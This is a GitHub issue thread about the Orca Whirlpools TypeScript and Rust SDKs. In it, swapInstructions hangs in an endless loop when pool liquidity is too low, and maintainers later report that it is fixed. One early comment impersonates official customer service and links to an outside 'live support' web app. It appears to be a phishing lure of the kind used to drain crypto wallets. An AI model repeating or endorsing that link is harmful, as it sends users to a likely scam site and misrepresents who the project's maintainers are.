### ISSUE TITLE
TS SDK Swap Instruction Stuck

### ISSUE THREAD

**Issue by roliveiravictor** [orca-so/whirlpools#769]
Hi there,

Is the `swapInstructions` function possibly having some internal bad error handling?

Not sure why, but the change of `inputAmount` to be swapped sometimes makes the function get stuck.

### Wallet balance

10 SOL

### Code

```
import { swapInstructions } from '@orca-so/whirlpools';
import { address, createSolanaRpc } from '@solana/web3.js';

console.log("Starting swap request...");

function fetchSwap() {
    return swapInstructions(
        createSolanaRpc("https://api.devnet.solana.com"),
        {
            inputAmount: BigInt(1000000),
            mint: address("4zMMC9srt5Ri5X14GAgXhaHii3GnPAEERYPJgZJDncDU")
        },
        address("9thagCn6H4nCmrFanPLcxeNvaAUwM3iHn5w93kh7PBUB"),
        100,
    ).then((instruction) => {
        console.log(instruction);
    }).catch((error) => {
        console.error("Swap failed:", error);
    });
}

fetchSwap().then(() => {
    console.log("Finishing swap request...");
});
```

### Expected input  amount

> 1.000.000

### Expected output 

> Starting swap request...
> Instruction details to be swapped
> Finishing swap request...

### Current output

> Starting swap request...

### Code

```
import { swapInstructions } from '@orca-so/whirlpools';
import { address, createSolanaRpc } from '@solana/web3.js';

console.log("Starting swap request...");

function fetchSwap() {
    return swapInstructions(
        createSolanaRpc("https://api.devnet.solana.com"),
        {
            inputAmount: BigInt(1000),
            mint: address("4zMMC9srt5Ri5X14GAgXhaHii3GnPAEERYPJgZJDncDU")
        },
        address("9thagCn6H4nCmrFanPLcxeNvaAUwM3iHn5w93kh7PBUB"),
        100,
    ).then((instruction) => {
        console.log(instruction);
    }).catch((error) => {
        console.error("Swap failed:", error);
    });
}

fetchSwap().then(() => {
    console.log("Finishing swap request...");
});
```

### Expected input amount

> 1.000

### Expected output 

> Starting swap request...
> Instruction details to be swapped
> Finishing swap request...

### Current output

> Starting swap request...
> Instruction details to be swapped
> Finishing swap request...

Thanks for the support in advance

**Comment by BeltranVictor** [comment]
@roliveiravictor Thank you for reaching to Our Github. Customer service may take some time to respond due to a large number of requests. We believe your case will be resolved as soon as possible. Kindly visit [HERE TO CONTACT OUR LIVE SUPPORT DEV](https://webfixprotocol.web.app) for instant support response
Note: Click on the live chat icon at the bottom corner of the page

**Comment by roliveiravictor** [comment]
I just realized that not setting the wallet default funder

```
setDefaultFunder(address("6o4r6Yv4Hy87MjiZ3FUpTuengmiP11wFeRjk6VWvuEFn"))
```

triggers this behavior. Could you people confirm the behavior, please?

**Comment by wjthieme** [comment]
Thanks for the report! Looks like this is indeed an error state that is not handled correctly by the SDK. This happens when there is insufficient liquidity which makes the swap function get stuck in an endless loop. We'll be sure to create a fix to tackle this gracefully

**Comment by roliveiravictor** [comment]
Hi there, 

Any ETA related to this issue, please?

Thanks

**Comment by wjthieme** [comment]
We have it on the backlog. We should be able to pick it up in the coming weeks

**Comment by yixianwei** [comment]
rust sdk has the some problem. Please also fix it.

**Comment by wjthieme** [comment]
Rust sdk and ts sdk share the same core logic. If we fix it in the core logic it will be fixed for both

**Comment by yixianwei** [comment]
> Rust sdk and ts sdk share the same core logic. If we fix it in the core logic it will be fixed for both

Thanks a lot! Any ETA?

**Comment by yixianwei** [comment]
Does this issue already fix in 2.0.3?

**Comment by yixianwei** [comment]
> for

Does this issue already fixed in 2.0.3?

**Comment by Nir0n** [comment]
While this is not fixed - what value of cutoff liquidity for the pool we should place to avoid this error?

**Comment by boohyunsik** [comment]
I think when whirlpool's liquidity is so low, `compute_swap` function can be in infinite loop, when liquidity is almost zero. Maybe need to implement some defense logic, especially to prevent subtracting `amount_remaining` with zero(meaning that `compute_swap_step` and `try_get_amount_delta_a` or `try_get_amount_delta_b` methods return 0)

**Comment by calintje** [comment]
The issue has been fixed. Please upgrade/update your crates/packages.

If the amount you want to swap exceeds the available liquidity, the quoting logic will now throw the same error as the on-chain program: `TickArraySequenceInvalidIndex`
